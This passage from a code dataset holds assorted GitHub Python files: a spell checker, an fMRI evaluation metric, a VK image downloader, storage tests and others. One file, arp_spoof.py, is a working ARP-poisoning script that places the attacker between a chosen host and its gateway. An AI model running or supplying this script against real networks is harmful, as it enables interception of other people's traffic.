'key': a}\n\n if c:\n c = [{'title': c_file.replace('_', ' ').partition('.')[0], 'key': os.path.join(a, c_file)} for c_file in c]\n things = [b, c]\n if any(thing for thing in things):\n di['children'] = things\n\n l.append(di)\n\n dirs = []\n for i in l:\n if (i.get('children')):\n if i.get('children')[0]:\n dirs.append(i)\n else:\n i['children'] = i.get('children')[1]\n dirs.reverse()\n\n for _dirs in dirs:\n child_list = [get_subdict(l, d) for d in _dirs.get('children')[0]]\n if _dirs['children'][1]:\n for i in _dirs['children'][1]:\n child_list.append(i)\n _dirs['children'] = child_list\n\n tree_dirs = dirs[-1]\n return tree_dirs\n\n\n\ndef parse_contents(contents, filename, med_serv):\n content_type, content_string = contents.split(',')\n\n global df\n decoded = base64.b64decode(content_string)\n try:\n if 'csv' in filename:\n df = pd.read_csv(\n io.StringIO(decoded.decode('utf-8')))\n elif 'xls' in filename:\n df = pd.read_excel(io.BytesIO(decoded))\n except Exception as e:\n print(e)\n\n if med_serv == 'hosp':\n df.to_excel(r'C:\\Users\\anna.muraveva\\Documents\\SAS\\rule_engine\\Услуги_hosp.xlsx', index=False)\n else:\n df.to_excel(r'C:\\Users\\anna.muraveva\\Documents\\SAS\\rule_engine\\Услуги_dent.xlsx', index=False)\n\n\ndef creat_table(df_output):\n return html.Div([\n dash_table.DataTable(\n data=df_output.to_dict('records'),\n columns=[{'name': i, 'id': i} for i in df_output.columns],\n style_data={\n # 'whiteSpace': 'normal',\n 'height': 'auto',\n 'lineHeight': '10px',\n 'minWidth': '180px', 'width': '180px', 'maxWidth': '300px',\n },\n\n tooltip_data=[\n {\n column: {'value': str(value), 'type': 'markdown'}\n for column, value in row.items()\n } for row in df_output.to_dict('records')\n ],\n tooltip_duration=None,\n\n style_cell={'textAlign': 'left',\n 'textOverflow': 'ellipsis',} # left align text in columns for readability\n ),\n ]\n )","repo_name":"Anna-Mur/web_interface_by_python","sub_path":"funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":2872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"29317369000","text":"# -*- coding: UTF-8 -*-\n\"\"\"\n@author: WanZhiWen \n@file: SpellCheckBayesian.py \n@time: 2017-12-24 15:50\n\n使用贝叶斯方法实现拼写检查\n\"\"\"\nimport re\nimport collections\n\n\n# 求解:argmaxc P(c|w) -> argmaxc P(w|c)P(c)/P(w)\n# P(c),文章中出现一个正确拼写词c的概率,也就是说,c出现的概率有多大\n# P(w|c),在用户想键入c的情况下敲成w的概率,这个代表用户会以多大的概率把c敲错成w\n# argmaxc,用来枚举所有可能的c并且选择概率最大的\n\n# 将语料库中的单词全部抽取出来,转换成小写,并且去除单词中间的特殊符号\ndef words(text):\n return re.findall(\"[a-z]+\", text.lower())\n\n\n# 统计语料库中每个单词出现的频数\ndef train(features):\n # 使用lambda: 1是为了当出现一个语料库中没有的单词时,model这个字典会输出1,而不会输出0\n model = collections.defaultdict(lambda: 1)\n for f in features:\n model[f] += 1\n return model\n\n\nNWORDS = train(words(open(\"words.txt\").read()))\n\n# 编辑距离:定义为使用了几次插入(在词中插入一个单字母), 删除(删除一个单字母), 交换(交换相邻两个字母),\n# 替换(把一个字母换成另一个)的操作从一个词变到另一个词.\n\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\n\n\n# 对于一个长度为 n 的单词, 可能有n种删除, n-1中对换, 26n 种\n# (译注: 实际上是 25n 种)替换 和 26(n+1) 种插入 (译注: 实际上比这个小, 因为在一个字母前后再插入这个字母构成的词是等价的).\n# 这样的话, 一共就是 54n + 25 中情况 (当中还有一点重复).\n# 比如说, 和 something 这个单词的编辑距离为1 的词按照这个算来是 511 个, 而实际上是 494 个.\n# 返回所有与单词 w 编辑距离为 1 的集合\ndef edits1(word):\n n = len(word)\n return set([word[0:i] + word[i + 1:] for i in range(n)] + # deletion\n [word[0:i] + word[i + 1] + word[i] + word[i + 2:] for i in range(n - 1)] + # transposition\n [word[0:i] + c + word[i + 1:] for i in range(n) for c in alphabet] + # alteration\n [word[0:i] + c + word[i:] for i in range(n + 1) for c in alphabet]) # insertion\n\n\n# 返回所有与单词 w 编辑距离为 2 的集合\n# 与 something 编辑距离为2的单词居然达到了 114,324 个\n# 优化:在这些编辑距离小于2的词中间, 只把那些正确的词作为候选词, known_edits2('something') 只能返回 3 个单词: 'smoothing', 'something' 和 'soothing'\ndef known_edits2(word):\n return set(e2 for e1 in edits1(word) for e2 in edits1(e1) if e2 in NWORDS)\n\n\n# known()函数接受一个单词的集合��将这个单词集合中错误的单词去掉\ndef known(words):\n return set(w for w in words if w in NWORDS)\n\n\n# 如果known(set)非空,candidates就会选取这个集合,而不会计算后面的\n# 这里选择:编辑距离为0的正确单词比编辑距离为1的优先级高,而编辑距离为1的正确单词比编辑距离为2的优先级高\ndef correct(word):\n # 如果or关键字中前面有非空值,就不会再计算后面的\n candidates = known([word]) or known(edits1(word)) or known_edits2(word) or [word]\n # NWORDS[w]越大,说明该单词w出现的频数越多,则P(w)越大\n # 对于传进来的单词word,如果该单词本身就是正确的,则candidates=[word],这时直接输出这个单词即可\n # 如果传进来的单词是经过一次编辑距离得到的错误单词,如tha,则经过known(edits1(word))处理后,\n # 就会出现the、than等正确的单词,并且由于这些正确的单词都是tha经过一次编辑距离得到的,\n # 即这些单词的P(w|c)都是相同的,则只要选出这些单词中NWORDS[w]最大的单词,就是我们所需要的P(w|c)P(c)最大的单词了\n return max(candidates, key=lambda w: NWORDS[w])\n\n\nwhile True:\n print(\"请输入单词:\")\n word = input()\n if word == \"q\":\n break\n else:\n print(\"可能的正确单词是:\", correct(word))\n","repo_name":"xiaoxiaopingzi/DeepLearning","sub_path":"ClassicAlgorithm/SpellCheckBayesian.py","file_name":"SpellCheckBayesian.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"20604351229","text":"import numpy as np\nfrom nibabel.freesurfer.mghformat import load\nfrom tqdm import tqdm\nfrom scipy.stats import pearsonr as corr\nimport os \n\ndef median_squared_noisenorm_correlation(lh_fmri_val_pred, \n rh_fmri_val_pred,\n lh_fmri_val,\n rh_fmri_val,\n data_dir,\n ncsnr_dir,\n images_trials_dir,\n idxs_val):\n ## Compute the correlation between the predicted and actual fMRI data ##\n print('Computing the correlation between the predicted and actual fMRI data...')\n # Empty correlation array of shape: (LH vertices)\n lh_correlation = np.zeros(lh_fmri_val_pred.shape[1])\n # Correlate each predicted LH vertex with the corresponding ground truth vertex\n for v in tqdm(range(lh_fmri_val_pred.shape[1])):\n lh_correlation[v] = corr(lh_fmri_val_pred[:,v], lh_fmri_val[:,v])[0] # 0 per selezionare valore e non p-value\n\n # Empty correlation array of shape: (RH vertices)\n rh_correlation = np.zeros(rh_fmri_val_pred.shape[1])\n # Correlate each predicted RH vertex with the corresponding ground truth vertex\n for v in tqdm(range(rh_fmri_val_pred.shape[1])):\n rh_correlation[v] = corr(rh_fmri_val_pred[:,v], rh_fmri_val[:,v])[0]\n\n ## Evaluate the model ##\n # NCSNR\n lh_ncsnr = load(os.path.join(ncsnr_dir, 'lh.ncsnr.mgh'))\n rh_ncsnr = load(os.path.join(ncsnr_dir, 'rh.ncsnr.mgh'))\n lh_ncsnr_all_vertices = lh_ncsnr.get_fdata()[:,0,0]\n rh_ncsnr_all_vertices = rh_ncsnr.get_fdata()[:,0,0]\n # fsaverage\n hemisphere = ['left', 'right'] #@param ['left', 'right'] {allow-input: true}\n # Load the brain surface map of all vertices\n roi_dir = os.path.join(data_dir, 'roi_masks',\n hemisphere[0][0]+'h.all-vertices_fsaverage_space.npy')\n lh_fsaverage_all_vertices = np.load(roi_dir)\n roi_dir = os.path.join(data_dir, 'roi_masks',\n hemisphere[1][0]+'h.all-vertices_fsaverage_space.npy')\n rh_fsaverage_all_vertices = np.load(roi_dir)\n # NCSNR for challenge vertices\n lh_ncsnr_challenge_vertices = lh_ncsnr_all_vertices[np.where(lh_fsaverage_all_vertices)[0]]\n rh_ncsnr_challenge_vertices = rh_ncsnr_all_vertices[np.where(rh_fsaverage_all_vertices)[0]]\n # TRIALS\n image_trial_number = np.load(os.path.join(images_trials_dir, 'train_images_trials.npy'))\n image_trial_number_val = image_trial_number[idxs_val]\n # Compute Noise Ceiling from NCSNR and TRIALS\n A = len(image_trial_number_val[image_trial_number_val == 3])\n B = len(image_trial_number_val[image_trial_number_val == 2])\n C = len(image_trial_number_val[image_trial_number_val == 1])\n lh_noise_ceiling = (lh_ncsnr_challenge_vertices ** 2) / ((lh_ncsnr_challenge_vertices ** 2) + ((A/3 + B/2 + C/1) / (A + B + C)))\n rh_noise_ceiling = (rh_ncsnr_challenge_vertices ** 2) / ((rh_ncsnr_challenge_vertices ** 2) + ((A/3 + B/2 + C/1) / (A + B + C)))\n # Compute Noise Normalized Squared Correlation\n \n # \"Xh_correlation\" are 1-D vectors with the correlation scores of all vertices\n # of a given Challenge subject (each component corresponds to the correlation\n # score of a vertex).\n\n # \"Xh_noise_ceiling\" are 1-D vectors with the noise ceiling values of all\n # vertices of a given Challenge subject (each component corresponds to the noise\n # ceiling value of a vertex).\n \n # Set negative correlation values to 0, so to keep the noise-normalized\n # encoding accuracy positive\n lh_correlation[lh_correlation<0] = 0\n rh_correlation[rh_correlation<0] = 0\n # Square the correlation values\n lh_correlation = lh_correlation ** 2\n rh_correlation = rh_correlation ** 2\n # Add a very small number to noise ceiling values of 0, otherwise the\n # noise-normalized encoding accuracy cannot be calculated (division by 0 is\n # not possible)\n lh_noise_ceiling[lh_noise_ceiling==0] = 1e-14\n rh_noise_ceiling[rh_noise_ceiling==0] = 1e-14\n # Compute the noise-normalized encoding accuracy\n lh_noise_norm_corr = np.divide(lh_correlation, lh_noise_ceiling)\n rh_noise_norm_corr = np.divide(rh_correlation, rh_noise_ceiling)\n # Set the noise-normalized encoding accuracy to 1 (100% accuracy) for those\n # vertices in which the correlation is higher than the noise ceiling, to prevent\n # encoding accuracy values higher than 100%\n lh_noise_norm_corr[lh_noise_norm_corr>1] = 1\n rh_noise_norm_corr[rh_noise_norm_corr>1] = 1\n \n return lh_noise_norm_corr, rh_noise_norm_corr\n\n\n","repo_name":"giocoal/algonauts2023-image-to-fMRI-BOLD-activations-encoding-models","sub_path":"src/evaluation_metrics.py","file_name":"evaluation_metrics.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"38215579646","text":"#!usr/bin/env python\r\n\r\nimport scapy.all as scapy\r\nimport time\r\nimport argparse\r\n\r\ndef get_arguments():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-t\", \"--target\", dest=\"target\", help=\"Ip you want to scan\")\r\n options = parser.parse_args()\r\n return options\r\n\r\ndef scan(ip):\r\n arp_request = scapy.ARP(pdst=ip)\r\n broadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\r\n arp_request_broadcast = broadcast/arp_request\r\n answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]\r\n\r\n clients_list = []\r\n for element in answered_list:\r\n client_dict = {\"ip\": element[1].psrc, \"mac\": element[1].hwsrc}\r\n clients_list.append(client_dict)\r\n return clients_list\r\n\r\ndef print_result(results_list):\r\n print(\"------------------------------------------------------------------------------\")\r\n print(\"IP\\t\\t\\tMAC Address\\n------------------------------------------------------------------------------\")\r\n for client in results_list:\r\n print(client[\"ip\"] + \"\\t\\t\" + client[\"mac\"])\r\n\r\noptions = get_arguments()\r\nscan_result = scan(options.target)\r\nprint_result(scan_result)\r\n\r\ntarget_ip = input(\"Please enter the targets IP address:\")\r\ngateway_ip = input(\"Please enter the gateway:\")\r\n\r\ndef get_mac(ip):\r\n arp_request = scapy.ARP(pdst=ip)\r\n broadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\r\n arp_request_broadcast = broadcast/arp_request\r\n answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]\r\n return answered_list[0][1].hwsrc\r\n\r\ndef spoof(target_ip, spoof_ip):\r\n target_mac = get_mac(target_ip)\r\n packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)\r\n scapy.send(packet, verbose=False)\r\n\r\ndef restore(destination_ip, source_ip):\r\n destination_mac = get_mac(destination_ip)\r\n source_mac = get_mac(source_ip)\r\n packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)\r\n scapy.send(packet, count=4, verbose=False)\r\n\r\n\r\n\r\ntry:\r\n sent_packet_count = 0\r\n while True:\r\n spoof(target_ip, gateway_ip )\r\n spoof(gateway_ip, target_ip)\r\n sent_packet_count = sent_packet_count + 2\r\n print(\"\\r[+] Packets sent: \" + str(sent_packet_count), end=\"\")\r\n time.sleep(2)\r\nexcept KeyboardInterrupt:\r\n print(\"[+] Detected CTRL + C ....... Resetting ARP table..... Please wait\")\r\n restore(target_ip, gateway_ip)\r\n restore(gateway_ip, target_ip)","repo_name":"icebowl/python","sub_path":"connor/arp_spoof.py","file_name":"arp_spoof.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"19919950670","text":"'''Verificar se os batimentos cardíacos por minuto se encontram na faixa adequada. Para isso, você deve solicitar ao usuário que informe o seu número de\nBATIMENTOS POR MINUTO (BPM) e a IDADE. A partir disso,o script deve verificar e exibir uma mensagem informando se os batimentos do usuário \nencontram-se DENTRO da faixa adequada, ACIMA da faixa adequada ou ABAIXO da faixa adequada, de acordo com o site Tua Saúde'''\n\n'''Até 2 anos de idade: 120 a 140 bpm,\nEntre 8 anos até 17 anos: 80 a 100 bpm,\nAdulto entre 18 até 60 anos: 70 a 80 bpm,\nIdosos acima de 60 anos: 50 a 60 bpm.'''\n\nprint (\"Verificador de frequências cardácas\")\nidade = int(input(\"Por favor, informe a sua idade \"))\nbpm = int(input(\"Por favor, informe seu número de batimentos por minuto (BPM) \"))\n\natividade_fisica = (\"Você pratica atividade física? (s/n)\")\n\nif idade <= 2:\n if bpm >= 120:\n if bpm <= 140:\n print (\"Frequência cardíaca dentro da faixa adequada\")\n else:\n print (\"Frequência cardíaca acima da faixa adequada\")\n else:\n print (\"Frequência cardíaca abaixo da faixa adequada\") \nelif idade >= 8 and idade <= 17:\n if bpm >= 80:\n if bpm <= 100:\n print (\"Frequência cardíaca dentro da faixa adequada\")\n else:\n print (\"Frequência cardíaca acima da faixa adequada\")\n else:\n print (\"Frequência cardíaca abaixo da faixa adequada\")\nelif idade >= 18 and idade <= 60:\n if bpm >= 70:\n if bpm <= 80:\n print (\"Frequência cardíaca dentro da faixa adequada\")\n else:\n print (\"Frequência cardíaca acima da faixa adequada\")\n else:\n print (\"Frequência cardíaca abaixo da faixa adequada\")\nelif idade >= 60:\n if bpm >= 50:\n if bpm <= 60:\n print (\"Frequência cardíaca dentro da faixa adequada\")\n else:\n print (\"Frequência cardíaca acima da faixa adequada\")\n else:\n print (\"Frequência cardíaca abaixo da faixa adequada\")\nelse:\n print (\"Não foi possível verificar os batimentos para essa idade\")\n\n\n \n \n\n\n \n ","repo_name":"VanessaSambrana/Python","sub_path":"BPM.py","file_name":"BPM.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"3965256867","text":"from datetime import datetime , timedelta\r\nfrom pytz import timezone\r\nfrom colored import fg, bg, attr\r\n\r\n\r\nBangkok = timezone('Asia/Bangkok')\r\nbkk =datetime.now(Bangkok)\r\nprint (\"Time in Bangkok is : \" +\r\n bkk.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec' ))\r\nprint('\\n')\r\n\r\n\r\n\r\nygn = bkk + timedelta(minutes= - 30 )\r\n#ygn = timedelta(minutes=ygn.minute % 10)\r\nprint (\"Time in Yangon is : \" +\r\n ygn.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec'))\r\nprint('\\n')\r\n\r\n\r\n#datetime.strptime(Bangkok, '%H:%M:%S')\r\n\r\n\r\n#Yangon = datetime.date(Bangkok) + dt\r\n\r\n\r\nhawaii = timezone('US/Hawaii')\r\nhw = datetime.now(hawaii)\r\nprint(\"Time in Hawaii is : \" +\r\n hw.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec'))\r\nprint('\\n')\r\n\r\nSeoul = timezone('Asia/Seoul')\r\nSe = datetime.now(Seoul)\r\nprint(\"Time in Seoul is : \" + \r\n Se.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec'))\r\nprint('\\n')\r\n\r\n\r\nShanghai = timezone('Asia/Shanghai')\r\nsh = datetime.now(Shanghai)\r\nprint(\"Time in Shanghai is : \" + \r\n sh.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec'))\r\nprint('\\n')\r\n\r\n\r\nTokyo = timezone('Asia/Tokyo')\r\nty = datetime.now(Tokyo)\r\nprint(\r\n \"Time in Tokyo is : \" +\r\n ty.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec'))\r\nprint('\\n')\r\n\r\n\r\nSydney = timezone('Australia/Sydney')\r\nsyd = datetime.now(Sydney)\r\nprint(\"Time in Sydney is : \" +\r\n syd.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec'))\r\nprint('\\n')\r\n \r\n\r\nLondon = timezone('Europe/London')\r\nLndn = datetime.now(London)\r\n\r\nprint( \"Time in London is : \" +\r\n Lndn.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec'))\r\n\r\n\r\n","repo_name":"baa256/Py-Projects","sub_path":"differentTimeZones.py","file_name":"differentTimeZones.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"15931772978","text":"import sys\n\nsys.stdin = open(\"input.txt\", \"r\")\n# 왼쪽에 둘거나 오른쪽에 둘거냐 안놓을거냐\n\ndef DFS(L, sum):\n global res\n if L == k:\n if S >= sum > 0:\n res.add(sum)\n else:\n DFS(L+1, sum+p[L])\n DFS(L+1, sum-p[L])\n DFS(L+1, sum)\n\nif __name__ == \"__main__\":\n k = int(input())\n p = list(map(int, input().split()))\n S = sum(p)\n res = set()\n DFS(0, 0)\n print(S - len(res))\n\n","repo_name":"Kosanseong/coding_test","sub_path":"test/BFSDFS/양팔저울.py","file_name":"양팔저울.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"28393265227","text":"import sys\nfrom PyQt4 import QtGui, QtCore\nimport time\nimport random\nimport socket\nimport urlparse\nimport httplib \n \nclass Main(QtGui.QMainWindow):\n def __init__(self, parent=None):\n super(Main, self).__init__(parent)\n self.text_area = QtGui.QTextBrowser()\n self.thread_button = QtGui.QPushButton('Start threads')\n self.thread_button.clicked.connect(self.start_threads)\n \n central_widget = QtGui.QWidget()\n central_layout = QtGui.QHBoxLayout()\n central_layout.addWidget(self.text_area)\n central_layout.addWidget(self.thread_button)\n central_widget.setLayout(central_layout)\n self.setCentralWidget(central_widget)\n \n \n def start_threads(self):\n if self.isrun==False:\n self.thread = MyThread(self) # create a thread\n self.thread.trigger.connect(self.update_text) # connect to it's signal\n self.thread.setup('', 8000) # just setting up a parameter\n self.thread.start() # start the thread\n self.thread.isAlive=True\n else:\n self.thread.isAlive=False\n self.isrun=False\n \n def update_text(self, thread_no):\n self.text_area.append('%s' % thread_no)\n \nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n \n mainwindow = Main()\n mainwindow.show()\n \n sys.exit(app.exec_())\n","repo_name":"JoeChen999/proto","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"9555969951","text":"\n#Use the following strings in your prompts and print statements\n\"\\nError. Please try again\"\n\"Enter a file name: \"\n\"\\n\\nGross Domestic Product\"\n\n#Use these contansts when displaying the results\nHEADER_FORMAT = \"{:<10s}{:>8s}{:>6s}{:>18s}\"\nDATA_FORMAT = \"{:<10s}{:>8.1f}{:>6d}{:>18.2f}\"\n\ndef open_file():\n ''' Docstring'''\n while True:\n file_name = input(\"Enter a file name: \")\n try:\n fp = open(file_name, \"r\")\n return fp\n except FileNotFoundError:\n print(\"Error. Please try again\")\n \ndef find_min_percent(line):\n ''' Docstring'''\n\n min_value = float(line[76:76 + 12].strip())\n min_index = 0\n for i in range(47):\n start = 76 + i * 12\n end = start + 12\n value = float(line[start:end].strip())\n if value < min_value:\n min_value = value\n min_index = i\n return min_value, min_index\n\ndef find_max_percent(line):\n ''' Docstring'''\n\n max_value = float(line[76:76 + 12].strip())\n max_index = 0\n for i in range(47):\n start = 76 + i * 12\n end = start + 12\n value = float(line[start:end].strip())\n if value > max_value:\n max_value = value\n max_index = i\n return max_value, max_index\n\ndef find_gdp(line, index):\n ''' Docstring'''\n\n start = 76 + index * 12\n end = start + 12\n return float(line[start:end].strip()) / 1000\n\n\ndef display(min_val, min_year, min_val_gdp, max_val, max_year, max_val_gdp):\n ''' Docstring'''\n\n print(\"\")\n print(\"Gross Domestic Product\")\n print(\"{:<10s}{:>8s}{:>6s}{:>18s}\".format(\"min/max\", \"change\", \"year\", \"GDP (trillions)\"))\n print(\"{:<10s}{:>8.1f}{:>6d}{:>18.2f}\".format(\"min\", min_val, min_year, min_val_gdp))\n print(\"{:<10s}{:>8.1f}{:>6d}{:>18.2f}\".format(\"max\", max_val, max_year, max_val_gdp))\n\n\ndef main():\n fp = open_file()\n lines = fp.readlines()\n line_9 = lines[9 - 1]\n line_44 = lines[44 - 1]\n start_year = 1969\n min_val, min_index = find_min_percent(line_9)\n min_year = start_year + min_index\n min_val_gdp = find_gdp(line_44, min_index)\n max_val, max_index = find_max_percent(line_9)\n max_year = start_year + max_index\n max_val_gdp = find_gdp(line_44, max_index)\n display(min_val, min_year, min_val_gdp, max_val, max_year, max_val_gdp)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MSU-coder/CSE231-MSU2023SUMMER","sub_path":"Project03/proj03.py","file_name":"proj03.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"28389883816","text":"# -*- coding: utf-8 -*-\n\"\"\"\nvk_url_parser.py\n~~~~~~~~~~~~~~~~~\n\nParsing image url from VK\n\"\"\"\nimport io\nimport os\nimport time\nimport filelock\n\nimport requests\nimport pandas as pd\nfrom hdfs import InsecureClient\nfrom vk_common.common_python import get_logger\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\n\nclass Watcher:\n\n def __init__(self, watch_directory: str):\n self.__log = get_logger(self.__class__.__name__)\n self.observer = Observer()\n self.watchDirectory = watch_directory\n\n def run(self, fs_mode: str, write_mode: str):\n \"\"\"\n\n :param fs_mode: listfile | watchdog\n :param write_mode: hdfs | local\n \"\"\"\n self.__log.info(f\"Starting url parser in mode {fs_mode} for a directory {self.watchDirectory}\")\n event_handler = VkUrlHandler(self.watchDirectory, write_mode=write_mode)\n if fs_mode == \"watchdog\":\n self.observer.schedule(event_handler, self.watchDirectory, recursive=False)\n self.observer.start()\n try:\n while True:\n time.sleep(5)\n except:\n self.observer.stop()\n self.__log.info(\"Observer Stopped\")\n\n self.observer.join()\n elif fs_mode == \"listfile\":\n try:\n while True:\n list_files = os.listdir(self.watchDirectory)\n list_files.sort(key=lambda f: os.path.getmtime(os.path.join(self.watchDirectory, f)))\n for file_name in list_files:\n if file_name.startswith(\"part\") and file_name.split(\".\")[-1] == \"parquet\":\n path_to_file = os.path.join(self.watchDirectory, file_name)\n self.__log.debug(file_name)\n try:\n event_handler.parse_parquet(path_to_file)\n except filelock._error.Timeout:\n self.__log.debug(f\"Skip file: {file_name}, file processing\")\n except FileNotFoundError:\n self.__log.debug(f\"Skip file: {file_name}, file read\")\n except Exception as e:\n self.__log.warn(f\"Error while parsing parquet: {e}\")\n self.__log.debug(\"Waiting new parquet file\")\n time.sleep(15)\n except Exception as e:\n self.__log.error(e)\n except KeyboardInterrupt:\n self.__log.info(\"Reading list files stopped\")\n return 0\n\n\nclass VkUrlHandler(FileSystemEventHandler):\n \"\"\"\n URL image parser from VK\n \"\"\"\n def __init__(self, watch_directory: str, write_mode: str = \"local\"):\n self.__log = get_logger(self.__class__.__name__)\n self.watchDirectory = watch_directory\n self.write_mode = write_mode\n hdfs_host = os.getenv(\"HDFS_HOST\", \"10.32.7.103\")\n hdfs_port = os.getenv(\"HDFS_PORT\", \"31179\")\n # need to upload active node\n self.hdfs_client = InsecureClient(f'http://{hdfs_host}:{hdfs_port}', user='jusergeeva-242388')\n self.hdfs_dir = os.getenv(\"HDFS_DIR\", \"/tmp/jusergeeva-242388/project\")\n\n def on_any_event(self, event):\n \"\"\"\n Watchdog feature\n\n :param event: create | move | modify | delete file in system\n \"\"\"\n if event.is_directory:\n return None\n elif event.event_type == 'moved' or event.event_type == 'created':\n path_to_file = event.src_path\n file_name = path_to_file.split(os.sep)[-1]\n if file_name.startswith(\"part\") and file_name.split(\".\")[-1] == \"parquet\":\n path_to_file = os.path.join(self.watchDirectory, file_name)\n self.__log.debug(f\"Watchdog received created event - {path_to_file}\")\n self.parse_parquet(path_to_file)\n\n def parse_parquet(self, path: str) -> None:\n \"\"\"\n Parse parquet file with links to images\n\n :param path: path to parquet file\n \"\"\"\n file_name = path.split(os.sep)[-1]\n lockfile_name = \".\" + file_name.split(\".\")[0] + \".lock\"\n lockfile =os.path.join(self.watchDirectory, lockfile_name)\n with filelock.FileLock(lock_file=lockfile, timeout=10):\n df = pd.read_parquet(path, engine=\"pyarrow\")\n for item in df.to_dict('records'):\n self.image_download(url=item[\"link\"], target=item[\"target\"], id=item[\"id\"],\n id_increment=item[\"id_increment\"])\n self.__log.debug(df.head())\n os.remove(path)\n os.remove(lockfile)\n self.__log.debug(f\"End process file: {path.split(os.sep)[-1]}\")\n\n def image_download(self, url: str, target: str, id: int, id_increment: int) -> None:\n \"\"\"\n Download image and save locally | to hdfs\n\n :param url: image url\n :param target: image group type (photo|painting)\n :param id: image number from source\n :param id_increment: id post from db\n \"\"\"\n self.__log.debug(f\"Start parse: id_increment={id_increment}, image_id={id}\")\n image_path = f\"data/images/{target}_2/img_{id}.jpg\"\n if self.write_mode == \"local\":\n os.makedirs(os.path.dirname(image_path), exist_ok=True)\n time.sleep(0.2)\n try:\n img_data = requests.get(url).content\n with open(image_path, 'wb') as img_handler:\n img_handler.write(img_data)\n except requests.exceptions.ConnectionError as e:\n self.__log.error(e)\n return None\n elif self.write_mode == \"hdfs\":\n time.sleep(0.2)\n image_path = os.path.join(self.hdfs_dir, f\"{target}_2\", f\"img_{id}.jpg\")\n try:\n img_data = requests.get(url).content\n # save image to hdfs\n with self.hdfs_client.write(image_path, overwrite=True) as img_handler:\n img_handler.write(img_data)\n except requests.exceptions.ConnectionError as e:\n self.__log.error(e)\n return None\n","repo_name":"Emidiant/vk-group-post-parser","sub_path":"url_parser/vk_url_parser.py","file_name":"vk_url_parser.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"72942568379","text":"import unittest\n\nimport mock\n\nfrom google.cloud.storage.retry import DEFAULT_RETRY\nfrom google.cloud.storage.retry import DEFAULT_RETRY_IF_METAGENERATION_SPECIFIED\n\nGCCL_INVOCATION_TEST_CONST = \"gccl-invocation-id/test-invocation-123\"\n\n\nclass Test__get_storage_host(unittest.TestCase):\n @staticmethod\n def _call_fut():\n from google.cloud.storage._helpers import _get_storage_host\n\n return _get_storage_host()\n\n def test_wo_env_var(self):\n from google.cloud.storage._helpers import _DEFAULT_STORAGE_HOST\n\n with mock.patch(\"os.environ\", {}):\n host = self._call_fut()\n\n self.assertEqual(host, _DEFAULT_STORAGE_HOST)\n\n def test_w_env_var(self):\n from google.cloud.storage._helpers import STORAGE_EMULATOR_ENV_VAR\n\n HOST = \"https://api.example.com\"\n\n with mock.patch(\"os.environ\", {STORAGE_EMULATOR_ENV_VAR: HOST}):\n host = self._call_fut()\n\n self.assertEqual(host, HOST)\n\n\nclass Test__get_environ_project(unittest.TestCase):\n @staticmethod\n def _call_fut():\n from google.cloud.storage._helpers import _get_environ_project\n\n return _get_environ_project()\n\n def test_wo_env_var(self):\n with mock.patch(\"os.environ\", {}):\n project = self._call_fut()\n\n self.assertEqual(project, None)\n\n def test_w_env_var(self):\n from google.auth import environment_vars\n\n PROJECT = \"environ-project\"\n\n with mock.patch(\"os.environ\", {environment_vars.PROJECT: PROJECT}):\n project = self._call_fut()\n self.assertEqual(project, PROJECT)\n\n with mock.patch(\"os.environ\", {environment_vars.LEGACY_PROJECT: PROJECT}):\n project = self._call_fut()\n\n self.assertEqual(project, PROJECT)\n\n\nclass Test_PropertyMixin(unittest.TestCase):\n @staticmethod\n def _get_default_timeout():\n from google.cloud.storage.constants import _DEFAULT_TIMEOUT\n\n return _DEFAULT_TIMEOUT\n\n @staticmethod\n def _get_target_class():\n from google.cloud.storage._helpers import _PropertyMixin\n\n return _PropertyMixin\n\n def _make_one(self, *args, **kw):\n return self._get_target_class()(*args, **kw)\n\n def _derivedClass(self, path=None, user_project=None):\n class Derived(self._get_target_class()):\n client = None\n _actual_encryption_headers = None\n\n @property\n def 